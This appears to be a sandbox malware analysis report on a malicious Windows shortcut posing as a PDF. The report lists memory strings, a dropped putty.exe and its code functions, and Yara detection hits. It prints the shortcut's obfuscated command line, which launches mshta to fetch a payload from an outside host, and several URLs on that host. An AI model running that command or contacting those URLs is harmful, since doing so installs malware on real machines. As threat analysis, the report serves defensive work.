Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/putty.exe
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg.pdf
Source: mshta.exe, 00000007.00000002.1433029163.0000022686D94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp, filepdf.pdf.lnk.download.lnk	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2
Source: mshta.exe, 00000007.00000003.1413222166.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2...
Source: mshta.exe, 00000007.00000003.1377641844.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2...&
Source: mshta.exe, 00000007.00000002.1432845185.0000022686D76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686D8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1429679889.0000022686D76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2:
Source: mshta.exe, 00000007.00000002.1448567133.0000022E8F120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2:asLMEMP
Source: mshta.exe, 00000007.00000003.1377641844.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2?
Source: mshta.exe, 00000007.00000003.1377641844.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2B
Source: mshta.exe, 00000007.00000003.1377641844.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1436832702.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1419941933.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1413222166.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1432548176.0000022686D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2C:
Source: mshta.exe, 00000007.00000002.1443996228.0000022687110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2DataFPS_BROW
Source: mshta.exe, 00000007.00000002.1443883497.0000022687100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2H
Source: mshta.exe, 00000007.00000003.1429253455.0000022686D91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686D8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2W
Source: mshta.exe, 00000007.00000002.1432845185.0000022686D76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1429679889.0000022686D76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2ent
Source: mshta.exe, 00000007.00000003.1422277497.0000022E89AD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2http://ukr-netdigitalhub.pro/x64dbg2
Source: mshta.exe, 00000007.00000003.1429253455.0000022686D91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686D8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2i
Source: mshta.exe, 00000007.00000003.1429253455.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2l
Source: mshta.exe, 00000007.00000002.1432845185.0000022686D76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1429679889.0000022686D76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/x64dbg2w4
Source: powershell.exe, 0000000A.00000002.1782431399.00000194DE035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.16.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 0000000A.00000002.1782431399.00000194DC7A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D0F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: qmgr.db.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000009.00000003.1380274984.000001E7B9A10000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.1782431399.00000194DD3D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mshta.exe, 00000007.00000003.1419941933.0000022686E00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1436832702.0000022686E00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1413222166.0000022686E00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 0000000A.00000002.1889681010.00000194EC814000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889681010.00000194EC957000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1782431399.00000194DE1E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.9.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: powershell.exe, 0000000A.00000002.1782431399.00000194DE035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000A.00000002.1782431399.00000194DE035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: ReaderMessages.15.dr	String found in binary or memory: https://www.adobe.co
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmp, putty.exe, 00000015.00000000.1600625150.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmp, putty.exe.13.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D257B000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB28B950 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,

21_2_00007FF6BB28B950

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB287060 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,SendMessageA,		21_2_00007FF6BB287060
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2885D0 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,GlobalFree,GlobalFree,		21_2_00007FF6BB2885D0

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB28B950 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,

21_2_00007FF6BB28B950

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB281EED ShowCursor,GetCursorPos,MonitorFromPoint,GetMonitorInfoA,IsZoomed,GetWindowLongPtrA,SendMessageA,GetKeyboardState,GetKeyboardState,GetMessageTime,ReleaseCapture,SetCapture,

21_2_00007FF6BB281EED

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_1836.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8120, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\putty.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: filepdf.pdf.lnk.download.lnk

LNK file: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF5D2F8	13_2_00007FFAAAF5D2F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF55F80	13_2_00007FFAAAF55F80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF7D3E0	13_2_00007FFAAAF7D3E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF5E318	13_2_00007FFAAAF5E318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF5BA99	13_2_00007FFAAAF5BA99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF5EAAB	13_2_00007FFAAAF5EAAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF5D0D8	13_2_00007FFAAAF5D0D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAB0232A0	13_2_00007FFAAB0232A0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2CBD50	21_2_00007FF6BB2CBD50
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2853E3	21_2_00007FF6BB2853E3
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A2C60	21_2_00007FF6BB2A2C60
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28CB24	21_2_00007FF6BB28CB24
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A6F7C	21_2_00007FF6BB2A6F7C
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A65F0	21_2_00007FF6BB2A65F0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB301CB0	21_2_00007FF6BB301CB0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB34BB90	21_2_00007FF6BB34BB90
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2C7C30	21_2_00007FF6BB2C7C30
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A3C20	21_2_00007FF6BB2A3C20
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2BDA70	21_2_00007FF6BB2BDA70
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB361A94	21_2_00007FF6BB361A94
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FBB20	21_2_00007FF6BB2FBB20
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28B9B0	21_2_00007FF6BB28B9B0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB35F964	21_2_00007FF6BB35F964
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB33F9DC	21_2_00007FF6BB33F9DC
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28A03E	21_2_00007FF6BB28A03E
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB286080	21_2_00007FF6BB286080
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB3660D4	21_2_00007FF6BB3660D4
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB294030	21_2_00007FF6BB294030
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28A032	21_2_00007FF6BB28A032
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28A01E	21_2_00007FF6BB28A01E
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FFE60	21_2_00007FF6BB2FFE60
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2D3EA0	21_2_00007FF6BB2D3EA0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2BFE90	21_2_00007FF6BB2BFE90
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB281EED	21_2_00007FF6BB281EED
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB287D50	21_2_00007FF6BB287D50
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB35DDF8	21_2_00007FF6BB35DDF8
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FDE20	21_2_00007FF6BB2FDE20
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB289E00	21_2_00007FF6BB289E00
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB294A80	21_2_00007FF6BB294A80
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB355490	21_2_00007FF6BB355490
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2F9480	21_2_00007FF6BB2F9480
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB343384	21_2_00007FF6BB343384
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB30D410	21_2_00007FF6BB30D410
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2893C0	21_2_00007FF6BB2893C0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FD430	21_2_00007FF6BB2FD430
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2C9430	21_2_00007FF6BB2C9430
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB281426	21_2_00007FF6BB281426
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB287410	21_2_00007FF6BB287410
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2BF260	21_2_00007FF6BB2BF260
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28F280	21_2_00007FF6BB28F280
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2D32EC	21_2_00007FF6BB2D32EC
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28D2D0	21_2_00007FF6BB28D2D0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FD2D0	21_2_00007FF6BB2FD2D0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB291330	21_2_00007FF6BB291330
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2B5310	21_2_00007FF6BB2B5310
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB281160	21_2_00007FF6BB281160
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2BD150	21_2_00007FF6BB2BD150
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB3551A8	21_2_00007FF6BB3551A8
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2811BB	21_2_00007FF6BB2811BB
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FF230	21_2_00007FF6BB2FF230
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB34387C	21_2_00007FF6BB34387C
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB355888	21_2_00007FF6BB355888
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB295890	21_2_00007FF6BB295890
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2C58D0	21_2_00007FF6BB2C58D0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB289920	21_2_00007FF6BB289920
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2B1780	21_2_00007FF6BB2B1780
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB34F804	21_2_00007FF6BB34F804
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28D810	21_2_00007FF6BB28D810
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB293650	21_2_00007FF6BB293650
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A1560	21_2_00007FF6BB2A1560
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2C76A0	21_2_00007FF6BB2C76A0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A3700	21_2_00007FF6BB2A3700
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A1560	21_2_00007FF6BB2A1560
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2BF550	21_2_00007FF6BB2BF550
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB3015A0	21_2_00007FF6BB3015A0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB346CA4	21_2_00007FF6BB346CA4
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB33EB94	21_2_00007FF6BB33EB94
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB340C30	21_2_00007FF6BB340C30
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A4C30	21_2_00007FF6BB2A4C30
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB340A48	21_2_00007FF6BB340A48
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB294A80	21_2_00007FF6BB294A80
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2D2A80	21_2_00007FF6BB2D2A80
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2AAAF0	21_2_00007FF6BB2AAAF0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB302B10	21_2_00007FF6BB302B10
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2C4B00	21_2_00007FF6BB2C4B00
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB290B00	21_2_00007FF6BB290B00
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FA9C0	21_2_00007FF6BB2FA9C0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2C6A00	21_2_00007FF6BB2C6A00
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2AF060	21_2_00007FF6BB2AF060
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2F9120	21_2_00007FF6BB2F9120
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2C6F90	21_2_00007FF6BB2C6F90
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2F6FE0	21_2_00007FF6BB2F6FE0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2DB020	21_2_00007FF6BB2DB020
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2B7010	21_2_00007FF6BB2B7010
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB342E80	21_2_00007FF6BB342E80
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2BAEF4	21_2_00007FF6BB2BAEF4
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB300F20	21_2_00007FF6BB300F20
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB35AEC8	21_2_00007FF6BB35AEC8
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB29CDA0	21_2_00007FF6BB29CDA0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB28ED80	21_2_00007FF6BB28ED80
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB340E18	21_2_00007FF6BB340E18
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2D8E20	21_2_00007FF6BB2D8E20
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FEE10	21_2_00007FF6BB2FEE10
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB340484	21_2_00007FF6BB340484
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2AA440	21_2_00007FF6BB2AA440
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB296374	21_2_00007FF6BB296374
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB30E3A0	21_2_00007FF6BB30E3A0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FE170	21_2_00007FF6BB2FE170
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB346144	21_2_00007FF6BB346144
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB34085C	21_2_00007FF6BB34085C
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB348748	21_2_00007FF6BB348748
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2DE7D0	21_2_00007FF6BB2DE7D0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB30A830	21_2_00007FF6BB30A830
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2A882D	21_2_00007FF6BB2A882D
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB368678	21_2_00007FF6BB368678
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB29A680	21_2_00007FF6BB29A680
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB340670	21_2_00007FF6BB340670
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB292700	21_2_00007FF6BB292700
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2FE540	21_2_00007FF6BB2FE540
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2F6590	21_2_00007FF6BB2F6590
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB33E5FC	21_2_00007FF6BB33E5FC
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2885D0	21_2_00007FF6BB2885D0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\putty.exe E61B8F44AB92CF0F9CB1101347967D31E1839979142A4114A7DD02AA237BA021

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2D5360 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2FA5D0 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB352CE8 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2BCC30 appears 150 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB34FC60 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2AC110 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2C2890 appears 137 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2FBFC0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB34B8AC appears 457 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2D6360 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2BCD00 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00007FF6BB2CA3A0 appears 38 times

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2061
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2061			Jump to behavior

Source: amsi64_1836.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8120, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
